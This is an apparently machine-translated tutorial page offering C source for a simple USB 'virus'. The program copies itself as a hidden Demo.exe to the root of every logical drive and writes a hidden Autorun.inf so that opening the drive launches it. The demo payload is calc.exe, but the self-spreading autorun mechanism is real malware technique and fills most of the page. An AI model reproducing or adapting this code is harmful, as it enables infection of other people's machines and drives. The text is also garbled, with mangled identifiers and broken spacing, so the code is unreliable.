The simplest analog USB virus (Autorun.inf)

Autorun.inf is a common system file used in our computer, which allows you to automatically run a specified file when you double-click the disk.
Here are a few API functions
1.DWORD getlogicaldrivestrings (DWORD nbufferlength,//size of BUFFERLPTSTR lpbuffer//drive strings buffer);
2.char *strncpy (char *dest,char *src,size_t n); 1th parameter: Char *strdest the purpose string pointer. 2nd parameter: const char *strsource source string pointer. 3rd parameter: size_t count copy length. Return value: The destination string pointer.
Here is the C/s code

#define _crt_secure_no_warnings #include <windows.h> char *gstrautorun = "[Autorun]\ \r\nop En=calc.exe \ \r\nshell\\open\\command=calc.exe \ \r\nshell\\explore= Resource Manager (& Amp                      X) \ \r\nshell\\explore\\command=calc.exe \ \r\nshellexecute=calc.exe\    \r\nshell\\auto\\command=calc.exe ";      void Infect (char *pstrfilepath) {char Strdrivestrings[maxbyte] = {0};      DWORD Dwdrivestrlen = Getlogicaldrivestringsa (Maxbyte, strdrivestrings);      DWORD dwerror = 0;           for (size_t i = 0; i < dwdrivestrlen; i + = 4) {char Strtargetpath[max_path] = {0}, Strroot[4] = {0};          strncpy (Strroot, &strdrivestrings[i], 4);          strcpy (Strtargetpath, strroot);          strcat (Strtargetpath, "Demo.exe"); if (!          Copyfilea (Pstrfilepath,strtargetpath,false)) {dwerror = GetLastError ();     }       Setfileattributesa (Strtargetpath, File_attribute_hidden);          strcpy (Strtargetpath, strroot);          strcat (Strtargetpath, "Autorun.inf");          HANDLE hfile = Createfilea (Strtargetpath, generic_write, 0, nullptr, create_always,file_attribute_hidden,nullptr);          DWORD dwlen = 0;          WriteFile (hfile, Gstrautorun, strlen (Gstrautorun), &dwlen, nullptr);      CloseHandle (hfile);      }} int main () {char Strselfpath[max_path] = {0};      GetModuleFileNameA (nullptr, Strselfpath, MAX_PATH);      Infect (Strselfpath);  return 0; }

The above is the simplest analog disk virus (Autorun.inf) content, more relevant content please pay attention to topic.alibabacloud.com (www.php.cn)!

